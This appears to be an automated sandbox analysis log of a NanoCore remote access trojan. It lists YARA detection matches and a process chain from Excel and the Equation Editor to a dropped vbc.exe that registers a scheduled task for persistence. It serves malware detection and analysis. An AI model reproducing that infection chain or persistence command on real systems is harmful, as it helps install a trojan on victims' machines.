Source: 7.2.RegSvcs.exe.d10000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.d00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.d00000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.38db858.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38db858.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.12a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.12a0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.38db858.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38db858.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.472e8a4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.472e8a4.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.d00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.d00000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.26e6198.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.26e6198.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38c3038.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.6f0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.6f0000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.38c7661.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.vbc.exe.35ce168.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.26e1340.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.26e1340.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675353317.0000000000CD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675022764.0000000000570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675802769.00000000012A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675222027.00000000007A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675222027.00000000007A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675311238.0000000000B70000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675311238.0000000000B70000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.484474935.00000000034E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.675867862.00000000026D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.675233867.00000000007B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675233867.00000000007B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675131963.00000000006F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675131963.00000000006F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675241372.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675241372.00000000007C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675167129.0000000000750000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675167129.0000000000750000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.674937327.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.676573390.0000000004720000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.676573390.0000000004720000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675197443.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675197443.0000000000780000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675397624.0000000000D00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675397624.0000000000D00000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.675417808.0000000000D10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.484758487.0000000003673000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegSvcs.exe PID: 1828, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\vbc.exeCode function: 4_2_00322C00
Source: C:\Users\Public\vbc.exeCode function: 4_2_00323970
Source: C:\Users\Public\vbc.exeCode function: 4_2_00323960
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C3020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C2418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003CEC40
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C9D20
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C9120
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003CC3E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003CB7E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003CC4A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C30E7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_003C9DE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_012965B7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_012959C8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0129668F
Source: C:\Users\Public\vbc.exeCode function: 4_2_00470A5A NtQuerySystemInformation,
Source: C:\Users\Public\vbc.exeCode function: 4_2_00470A29 NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_0053131E NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 7_2_005312E3 NtQuerySystemInformation,
Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
Source: sunday[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: CXFxEHIAOoJFws.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................@...........E.R.R.O.R.:. ...................................................................................................
Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................@...........E.R.R.O.(.P.............................................................................X.......................
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CXFxEHIAOoJFws' /XML 'C:\Users\user\AppData\Local\Temp\tmp98E5.tmp'
